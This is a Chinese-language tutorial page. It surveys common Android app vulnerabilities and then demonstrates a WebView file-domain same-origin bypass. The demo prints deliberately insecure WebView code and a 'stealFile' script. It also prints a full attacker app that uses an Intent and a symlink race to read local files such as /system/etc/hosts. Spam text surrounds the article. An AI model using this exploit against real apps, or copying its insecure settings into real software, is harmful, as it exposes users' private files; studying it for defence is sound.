中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

WebView File域同源策略繞過漏洞實例分析

發布時間:2022-01-18 13:44:24 來源:億速云 閱讀:138 作者:柒染 欄目:網絡安全

WebView File域同源策略繞過漏洞實例分析,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

基本知識Android架構

  • Kernel內核層 
    漏洞危害極大,通用性強 
    驅動由于多而雜,也可能存在不少漏洞

  • Libaries系統運行庫層

    • 系統中間件形式提供的運行庫 
      包括libc、WebKit、SQLite等等

    • AndroidRunTime 
      Dalvik虛擬機和內核庫

  • FrameWork應用框架層 
    提供一系列的服務和API的接口

    • 活動管理器

    • 內容提供器

    • 視圖

    • 資源管理器

    • 通知管理器

  • Application應用層

    • 系統應用 
      主屏幕Home、聯系人Contact、電話Phone、瀏覽器Browser

    • 其他應用 
      開發者使用應用程序框架層的API實現的程序

Andoroid常用組件

  • Acitivity活動

  • Service服務

  • BroadcastRecviver廣播接收器

  • ContentProvider內容提供器

Android App常見漏洞     (OWASP Mobile Top 10)平臺使用不當

  • 概述 
    平臺功能的濫用,或未能使用平臺的安全控制。如Intent誤用、權限誤用等

  • 風險 
    很廣泛,可能涉及移動平臺各個服務

  • 舉例 
    iOS系統中,將密碼數據存放在本地文件而沒有存放在密鑰鏈中,導致可以從偽加密的備份數據中讀取 
    Android系統中,Intent使用不當導致惡意用戶劫持修改intent的內容,以原進程的身份權限執行任意動作

  • 不安全的數據存儲

  • 不安全的通信

典型漏洞及挖掘方法數據存儲漏洞

  • 數據文件或目錄

    • 明文存儲

    • MODE_PRIVATE

    • 明文存儲

    • 創建數據庫時沒有使用MODE_PRIVATE模式

    • 創建配置文件時沒有使用MODE_PRIVATE模式,導致其他程序可以讀取配置文件

    • 明文存儲,而root用戶可讀,導致敏感數據泄露

    • SharedPreferences 
      data/data/程序包名/shared_prefs/*.xml

    • SQLiteDatabases 
      data/data程序包名/database/*.db


    • InternalStorage 
      data/data/程序報名/files/*


    • ExternalStorage 
      /mnt/sdcard/*

  • 檢測方法

    • 瀏覽/data/data/包名目錄下的各個文件和目錄,檢查是否存在others用戶可讀的文件

    • 檢查配置文件、數據庫等是否存在明文敏感信息

  • 挖掘方法

    • 代碼檢測 
      檢查openFileOutput、getSharedPrefreences、openOrCreateDatabase等函數的mode參數是否為MODE_PRIVATE(0x0000)

數據通信漏洞

  • 使用HTTP等明文協議將敏感信息傳送至服務端

    • 通過局域網嗅探、惡意公共WIFI、惡意代理服務、DNS劫持等手段捕獲明文通信,產生中間人攻擊

  • SSL證書弱校驗


    • 搜索.method public checkServerTrusted

    • 定位.method和end method

    • 檢查是否存在return-void

    • 同理檢查verify(String, SSLSession)的返回值是否恒為True、X509HostnameVerifier的參數是否為ALLOW_ALLHOSTNAME_VERIFIER

    • 開啟Fiddler的HTTPS解析功能,生成并導出自簽名證書,安裝到手機中

    • 開啟Fiddler代理,并允許遠程主機連接該代理

    • APP中缺乏對SSL證書的校驗 
      客戶端中應該實現X509TruestManager類,包括checkServerTrusted\checkClientTrusted\getInstance三個方法

    • 證書校驗失敗會導致異常,然后由應用程序對證書校驗異常進行處理

    • 未對服務器證書校驗會導致TLS中間人攻擊 
      使用HttpsURLConnection時,實現自定義HostnameVerifier過程中未對主機名做驗證,則默認不檢查證書域名與站點名是否匹配。或者在設置HttpsURLConnection的HostnameVerifier時,將其設為ALLOW_ALL_HOSTNAME_VERIIER則接受所有域名.

    • 攻擊方法

    • 挖掘方法

  • SSL證書強校驗 
    可能通過Xp、Patch等方法繞過


組件暴露漏洞

  • Android:exported是四大組件中都有的一個屬性,用來表示是否支持其他應用調用當前組件

  • 如果有intent-filter,默認值為true;反之默認則為false

  • exported導出組件的權限控制

  • 繞過認證

    • activity暴露后被第三方調用,可能在沒有密碼的情況下登錄/重置密碼

  • 敏感信息泄露

    • recviver暴露后被第三方啟動,可能查看到調試等信息中包含的敏感信息

  • 越權行為


    • 低權限程序通過調用高權限程序暴露的組件,執行高權限動作

  • 挖掘方法



    • 查看AndroidManifest.xml

    • 通過drozer的attacksurface工具進行安全評估

弱加密漏洞

  • 密碼硬編碼 
    反編譯、root查看等可以取得

  • AES/DES弱加密 
    ECB模式容易受到分析或重放攻擊

WebView

主要包括三種漏洞:

  • 任意代碼執行

    • 編寫遍歷對象的網頁,如果存在getClass方法則存在遠程代碼執行漏洞

    • fiddler的before腳本可以讓任意webview訪問任意網頁時進行測試

    • Android4.2以后,通過addJavascriptInterface注解的方法可被網頁中的java方法調用。如果未加過濾則可能存在漏洞

    • 挖掘方法:

  • 域控制不嚴格

    • setAllowFileAccess

    • setAllowFileAccessFromFileURLs

    • setAllowUniversalAccessFromFileURLs(導致遠程泄露敏感信息)

    • 通過符號鏈接攻擊可以訪問本地文件:無論怎么限制,js都能訪問本文件的。而通過延時執行和將當前文件替換成指向指向其他文件的軟連接就可以讀取到被符號鏈接所指向的文件

    • WebView如果打開了對JavaScript的支持,同時未對file:///形式的URL做限制,則會導致coookie、私有文件、數據庫等敏感信息泄露

  • 密碼明文存儲 
    當用戶選擇保存在WebViEW中輸入的用戶名和密碼時,則會被明文保存到app目錄下的data.db中 
    具有root權限的攻擊者可以讀取

漏洞挖掘流程總結

  • 靜態分析 
    快速檢測,獲得分析重點目標

    • 檢查AndroidManifest文件

    • 腳本分析Smali代碼

  • 動態分析 
    對疑似風險進行驗證和危害評估

    • 調試模式分析

    • 嘗試操作/漏洞驗證

    • drozer

    • 抓包分析數據及接口

  • 逆向分析 
    加密破解以及對邏輯和代碼的進一步分析





    • -

  • 自動化輔助系統

    • MobSF 包括前端web界面,

    • Marvin 包括前端web界面,部署麻煩

    • Inspeckage Xposed插件

今天我們就來講講WebView 的漏洞

[Java] 純文本查看 復制代碼

?

示例代碼地址:https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo。

或者是我的github:https://github.com/MaxSecret/AppVulnerability/tree/master/WebViewFileDemo1

代碼如下代碼主要區別在于這次加載的attack_file.html

public class MainActivity extends Activity {  

    private WebView webView;  

    private Uri mUri;  

    private String url;  

    String mUrl1 = "file:///android_asset/html/attack_file.html";  

    //String mUrl2 = "file:///android_asset/html/test.html";  

    @Override 

    protected void onCreate(Bundle savedInstanceState) {  

        super.onCreate(savedInstanceState);  

        setContentView(R.layout.activity_main);  

        webView = (WebView) findViewById(R.id.webview);  

        webView.getSettings().setJavaScriptEnabled(true);  

        webView.addJavascriptInterface(new JSInterface(), "jsInterface");  

        webView.getSettings().setAllowFileAccessFromFileURLs(true);  

        webView.setWebChromeClient(new WebChromeClient() {  

            @Override 

                public boolean onJsAlert(WebView view, String url, String message,JsResult result) {  

                //Required functionality here  

                return super.onJsAlert(view, url, message, result);  

            }  

        });  

        webView.loadUrl(mUrl1);  

    }  

    class JSInterface {  

        public String onButtonClick(String text) {  

            final String str = text;  

            runOnUiThread(new Runnable() {  

                @Override 

                public void run() {  

                    Log.e("leehong2", "onButtonClick: text = " + str);  

                    Toast.makeText(getApplicationContext(), "onButtonClick: text = " + str, Toast.LENGTH_LONG).show();  

                }  

            });  

            return "This text is returned from Java layer.  js text = " + text;  

        }  

        public void onImageClick(String url, int width, int height) {  

            final String str = "onImageClick: text = " + url + "  width = " + width + "  height = " + height;  

            Log.i("leehong2", str);  

            runOnUiThread(new Runnable() {  

                @Override 

                public void run() {  

                    Toast.makeText(getApplicationContext(), str, Toast.LENGTH_LONG).show();  

                }  

            });  

        }  

    }  

}

這里webView.getSettings().setAllowFileAccessFromFileURLs(true),標示可以通過javaScript訪問file文件。

   我們再來看attack_file.html的代碼:‘

<font ><font face="&ampquot;"><font ><html>  

<body>  

<script>  

function stealFile()  

{  

    var file = "file:///mnt/sdcard/233.txt";  

    var xmlHttpReq = new XMLHttpRequest();  

    xmlHttpReq.onreadystatechange = function(){  

        if(xmlHttpReq.readyState == 4){  

            alert(xmlHttpReq.responseText);  

        }  

    }  

xmlHttpReq.open("GET", file);  

xmlHttpReq.send(null);  

}  

stealFile();  

</script>  

</body>  

</html>  </font></font></font>

由于setAllowFileAccessFromFileURLs為true,所以webView.load這個html可以返回/mnt/sdcard/2333.txt的值。

如果setAllowFileAccessFromFileURLs為false,webView.load這個html不可以返回/mnt/sdcard/2333.txt的值。

即使setAllowFileAccessFromFileURLs為false,我們通過一種方式也可以跨過這個限制,這個我下一次講講.

  首先運行WebViewFileDemo1,然后再運行AttackWebView來襲擊WebView。   

    我們首先看WebViewFileDemo1,主要代碼如下:

<font face="&ampquot;"><font >package com.example.webviewfiledemo; [/size][/font][/p]  

import android.app.Activity;  

import android.content.Intent;  

import android.net.Uri;  

import android.os.Bundle;  

import android.util.Log;  

import android.webkit.JsResult;  

import android.webkit.WebChromeClient;  

import android.webkit.WebView;  

import android.widget.Toast;  

public class MainActivity extends Activity {  

    private WebView webView;  

    private Uri mUri;  

    private String url;  

    @Override 

    protected void onCreate(Bundle savedInstanceState) {  

        super.onCreate(savedInstanceState);  

        setContentView(R.layout.activity_main);  

        webView = (WebView) findViewById(R.id.webview);  

        webView.getSettings().setJavaScriptEnabled(true);  

        webView.addJavascriptInterface(new JSInterface(), "jsInterface");  

        webView.getSettings().setAllowFileAccessFromFileURLs(false);  

        //webView.getSettings().setAllowFileAccess(false);  

        webView.setWebChromeClient(new WebChromeClient() {  

            @Override 

                public boolean onJsAlert(WebView view, String url, String message,JsResult result) {  

                //Required functionality here  

                return super.onJsAlert(view, url, message, result);  

            }  

        });  

        Intent i = getIntent();  

        if (i != null) {  

            mUri = i.getData();  

        }  

        if (mUri != null) {  

            url = mUri.toString();  

        }  

        if (url != null) {  

            webView.loadUrl(url);  

        }  

    }  

}  </font></font>

這個Activity接收來自外部的Intent,提取Intent里面的url并加載。

接著我們來看AttackWebView工程,這里就是向com.example.webviewfiledemo.MainActivity發送Intent的工程。代碼如下:

public class MainActivity extends Activity {  

    public final static String HTML =   

            "<body>" +  

            "<u>Wait a few seconds.</u>" +   

            "<script>" +  

            "var d = document;"+  

            "function doitjs(){"+  

            "var xhr = new XMLHttpRequest;"+  

            "xhr.onload = function(){"+  

            "var txt = xhr.responseText;"+  

            "d.body.appendChild(d.createTextNode(txt));"+  

            "alert(txt);"+"};"+  

            "xhr.open('GET',d.URL);"+  

            "xhr.send(null);"+  

            "}"+  

            "setTimeout(doitjs,8000);"+  

            "</script>"+  

            "</body>";  

    public static String MY_TMP_DIR;  

    @Override 

    protected void onCreate(Bundle savedInstanceState) {  

        super.onCreate(savedInstanceState);  

        setContentView(R.layout.activity_main);  

        MY_TMP_DIR = getDir("payload_odex", MODE_PRIVATE).getAbsolutePath();  

        doit();  

    }  

    public void doit() {  

        String HTML_PATH = MY_TMP_DIR + "/A0" + ".html";  

        try {  

            cmdexec("mkdir " + MY_TMP_DIR);  

            cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);  

            cmdexec("chmod -R 777 " + MY_TMP_DIR);  

            Thread.sleep(1000);  

            invokeVulnAPP("file://" + HTML_PATH);  

            Thread.sleep(6000);  

            cmdexec("rm " + HTML_PATH);  

            cmdexec("ln -s " + "/system/etc/hosts" + " " + HTML_PATH);  

        } catch (Exception e) {  

            // TODO: handle exception  

        }  

    }  

    public void invokeVulnAPP(String url) {  

        try {  

            Intent intent = new Intent(Intent.ACTION_MAIN,Uri.parse(url));  

            intent.addCategory(Intent.CATEGORY_LAUNCHER);   

            intent.setClassName("com.example.webviewfiledemo", "com.example.webviewfiledemo.MainActivity");  

            startActivity(intent);  

        } catch (Exception e) {  

            // TODO: handle exception  

        }  

    }  

    public void cmdexec(String cmd) {  

        try {  

            String[] tmp = new String[] { "/system/bin/sh", "-c", cmd };  

            Runtime.getRuntime().exec(tmp);  

        } catch (Exception e) {  

            // TODO: handle exception  

        }  

    }  

}

通過invokeVulnAPP,打開了com.example.webviewfiledemo.MainActivity并傳遞了Intent。這個Activity提取了Url,Url為/sdcard/payload_odex/A0.html,webView加載了這個html,html內容如下:

public final static String HTML =   

        "<body>" +  

        "<u>Wait a few seconds.</u>" +   

        "<script>" +  

        "var d = document;"+  

        "function doitjs(){"+  

        "var xhr = new XMLHttpRequest;"+  

        "xhr.onload = function(){"+  

        "var txt = xhr.responseText;"+  

        "d.body.appendChild(d.createTextNode(txt));"+  

        "alert(txt);"+"};"+  

        "xhr.open('GET',d.URL);"+  

        "xhr.send(null);"+  

        "}"+  

        "setTimeout(doitjs,8000);"+  

        "</script>"+  

        "</body>";

當WebViewFileDemo1工程中webView加載A0.html后,這個html的作用是延遲8秒讀取A0.html本身。我們再回到AttackWebView工程,往下看代碼。

cmdexec("mkdir " + MY_TMP_DIR); 

            cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);   cmdexec("chmod -R 777 " + MY_TMP_DIR);  

            Thread.sleep(1000);  

            invokeVulnAPP("file://" + HTML_PATH);  

            Thread.sleep(6000);  

            cmdexec("rm " + HTML_PATH);  

            cmdexec("ln -s " + "/system/etc/hosts" + " " + HTML_PATH);

調用完invokeVulnAPP后,6秒后,我們首先把A0.html刪除,然后再重新軟連接到/system/etc/hosts。注意此時當WebViewFileDemo1工程中webView加載A0.html,這個html的作用是延遲8秒讀取A0.html本身,所以8秒后讀取的是軟連接/system/etc/hosts 。

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

繁峙县| 谢通门县| 康乐县| 上虞市| 浦县| 龙门县| 襄垣县| 满城县| 顺昌县| 建阳市| 侯马市| 平凉市| 搜索| 清镇市| 沙洋县| 霍邱县| 蒲城县| 自治县| 措勤县| 如东县| 松潘县| 灯塔市| 周宁县| 繁昌县| 江油市| 崇左市| 荔浦县| 荔波县| 琼海市| 拉孜县| 博湖县| 米脂县| 济南市| 南宫市| 德庆县| 麻栗坡县| 诸城市| 皋兰县| 广东省| 漳州市| 陵水|